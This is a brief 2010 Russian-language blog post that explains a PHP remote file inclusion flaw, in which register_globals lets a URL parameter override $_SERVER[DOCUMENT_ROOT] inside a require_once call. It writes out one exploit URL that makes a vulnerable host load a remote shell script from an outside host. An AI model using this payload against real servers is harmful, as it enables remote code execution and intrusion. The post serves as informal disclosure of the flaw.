herm1t LIVE!ng room - January 9th, 2010 [entries|archive|friends|userinfo]
herm1t

[ website | twilight corner in the herm1t's cave ]
[ userinfo | ljr userinfo ]
[ archive | journal archive ]

January 9th, 2010

/?_SERVER... [Jan. 9th, 2010|09:09 pm]
[Tags|, ]

В коде одного популярного сервиса есть такое: 
require_once($_SERVER[DOCUMENT_ROOT]."somepath");
что в сочетании с register_globals даёт феерический эффект. пишем в строке броузера: 
vulnerable-host.com/?_SERVER[DOCUMENT_ROOT]=http://ourhost.com/shell.txt?
сам попался Ж%-) пришлось чистить машину. Ж-)))
Link6 comments|Leave a comment

navigation
[ viewing | January 9th, 2010 ]
[ go | Previous Day|Next Day ]